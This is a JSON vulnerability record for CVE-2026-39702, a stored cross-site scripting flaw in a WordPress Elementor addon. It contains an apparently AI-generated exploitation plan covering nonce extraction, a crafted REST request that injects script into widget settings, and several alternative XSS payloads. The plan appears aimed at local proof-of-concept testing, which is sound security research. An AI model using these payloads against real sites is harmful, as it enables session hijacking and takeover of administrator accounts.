[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fkhR9tty8lHGY9u2l6owYv8kEjRUzmouG8O32Ipge54k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-39702","animation-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting","Animation Addons for Elementor \u003C= 2.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Animation Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","animation-addons-for-elementor",null,"\u003C=2.6.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-04-15 21:47:39",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F630c89bf-de7a-491f-b2b6-8f573071cf71?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-39702 Animation Addons for Elementor Stored XSS\n\n## 1. Vulnerability Summary\nThe **Animation Addons for Elementor** plugin (up to v2.6.2) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize user-supplied widget settings when they are saved and subsequently fails to escape those settings when they are rendered on the frontend. \n\nAs an Elementor addon, the plugin registers custom widgets or extensions. In WordPress, Elementor widget data is stored as a JSON-encoded string in the `_elementor_data` post meta. Since a Contributor can create posts and use the Elementor editor, they can inject malicious scripts into widget properties (like IDs, classes, or custom animation attributes) that are then executed in the context of any user (including Administrators) viewing or editing the affected page.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress REST API for Elementor (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fpages\u002F{id}` or `\u002Fwp-json\u002Felementor\u002Fv1\u002Feditor-data`) or the standard Elementor heartbeat\u002Fsave mechanism.\n*   **Vulnerable Parameter:** Individual properties within the `_elementor_data` JSON structure (e.g., a text field for \"Animation ID\" or \"Custom Attributes\").\n*   **Required Authentication:** Contributor level or higher.\n*   **Preconditions:** The plugin must be active, and Elementor must be enabled for the post type being edited.\n\n## 3. Code Flow (Inferred)\n1.  **Input:** A Contributor user opens a post in the Elementor editor.\n2.  **Storage:** The user adds an \"Animation Addons\" widget and enters a payload into a setting field (e.g., a field named `gsap_custom_id` or `gsap_animation_name`).\n3.  **Save:** Elementor sends the widget configuration to the server via the REST API. The plugin's widget class (extending `\\Elementor\\Widget_Base`) does not sanitize this specific field in its `register_controls()` or via a validation hook.\n4.  **Database:** The payload is stored in the `wp_postmeta` table under the key `_elementor_data`.\n5.  **Rendering:** When a user visits the page, Elementor calls the widget's `render()` method. The plugin likely outputs the property directly:\n    ```php\n    \u002F\u002F Example of vulnerable rendering in the plugin's widget file\n    protected function render() {\n        $settings = $this->get_settings_for_display();\n        echo '\u003Cdiv id=\"' . $settings['gsap_custom_id'] . '\">'; \u002F\u002F VULNERABLE: No esc_attr()\n    }\n    ```\n\n## 4. Nonce Acquisition Strategy\nTo save Elementor data via the REST API, the execution agent needs a WordPress REST API nonce.\n\n1.  **Identify Trigger:** The plugin's scripts are usually loaded when the Elementor Editor is active.\n2.  **Setup Page:**\n    *   Create a page as a Contributor: `wp post create --post_type=page --post_status=publish --post_title=\"XSS Test\" --post_author=[CONTRIBUTOR_ID]`\n3.  **Navigate:** Use `browser_navigate` to go to the Elementor Editor for that page: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`\n4.  **Extract Nonce:** Elementor stores its configuration and nonces in a global JavaScript object. Use `browser_eval` to retrieve it:\n    *   `browser_eval(\"window.elementorConfig?.api_nonce\")` (Primary)\n    *   `browser_eval(\"window.elementorCommon?.config?.ajax?.nonce\")` (Backup)\n\n## 5. Exploitation Strategy\nThe goal is to update the `_elementor_data` of a post with a payload that triggers when the page is viewed.\n\n### Step-by-Step Plan:\n1.  **Find Vulnerable Property:** Use `grep` in the plugin directory to find potential sinks:\n    ```bash\n    grep -r \"echo\" . | grep \"settings\\[\"\n    ```\n    Look for properties in files within `widgets\u002F` or `modules\u002F`. For example, if a widget has a control named `gsap_id`.\n\n2.  **Craft the Payload:** \n    A standard attribute breakout: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    Or an event handler: `x\" onmouseover=\"alert(1)`\n\n3.  **Prepare the REST Request:**\n    *   **Method:** `POST`\n    *   **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fpages\u002F[POST_ID]`\n    *   **Headers:**\n        *   `X-WP-Nonce`: [EXTRACTED_NONCE]\n        *   `Content-Type`: `application\u002Fjson`\n    *   **Body:**\n        ```json\n        {\n          \"meta\": {\n            \"_elementor_data\": \"[{\\\"id\\\":\\\"unique_id\\\",\\\"elType\\\":\\\"widget\\\",\\\"widgetType\\\":\\\"gsap-animation-widget-name\\\",\\\"settings\\\":{\\\"gsap_id\\\":\\\"\\\\\\\">\u003Cscript>alert(1)\u003C\\\\\u002Fscript>\\\"},\\\"elements\\\":[]}]\"\n          }\n        }\n        ```\n        *(Note: `_elementor_data` is stored as a stringified JSON array of objects. The `widgetType` must match a real widget from the plugin, e.g., `gsap-motion-addon`).*\n\n4.  **Execute via `http_request`:** Submit the crafted JSON to the REST API.\n\n5.  **Trigger:** Navigate to the frontend URL of the page (`\u002F?p=[POST_ID]`) and check for the script execution.\n\n## 6. Test Data Setup\n1.  **User:** Create a Contributor user: `wp user create victim-contributor victim@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Setup:** Ensure \"Animation Addons for Elementor\" is active.\n3.  **Identify Widget Slug:** Run `grep -r \"get_name\" .` in the plugin directory to find the internal slugs for the widgets (e.g., `gsap-text-animation`).\n\n## 7. Expected Results\n*   The REST API should return a `200 OK` status confirming the post update.\n*   The `wp_postmeta` table should contain the payload within the `_elementor_data` field.\n*   Viewing the page source on the frontend should show the unescaped payload:\n    `\u003Cdiv id=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\">`\n\n## 8. Verification Steps\n1.  **Check Meta:** Use WP-CLI to verify the payload is stored:\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n2.  **Frontend Check:** Use `http_request` (GET) to fetch the page and check if the payload exists in the response body:\n    ```bash\n    # Verify the script tag exists in the HTML\n    http_request(url=\"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\")\n    ```\n\n## 9. Alternative Approaches\n*   **Elementor Heartbeat:** If the REST API endpoint is restricted, use the Elementor `heartbeat` AJAX action (`action=elementor_ajax`) which often allows saving editor data.\n*   **Extension XSS:** Many Animation Addons are \"extensions\" to existing Elementor widgets. Check if the plugin adds a \"Motion Effects\" or \"GSAP\" section to the standard \"Button\" or \"Heading\" widgets. In this case, the payload would be added to a standard widget's `settings` object under a key like `_gsap_animation_id`.\n*   **Payload Variation:** If `\u003Cscript>` is blocked by a WAF (unlikely in this local environment), use:\n    `\u003Cimg src=x onerror=alert(1)>`\n    `\" onfocus=\"alert(1)\" autofocus=\"`","gemini-3-flash-preview","2026-04-18 22:12:02","2026-04-18 22:12:24",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanimation-addons-for-elementor\u002Ftags"]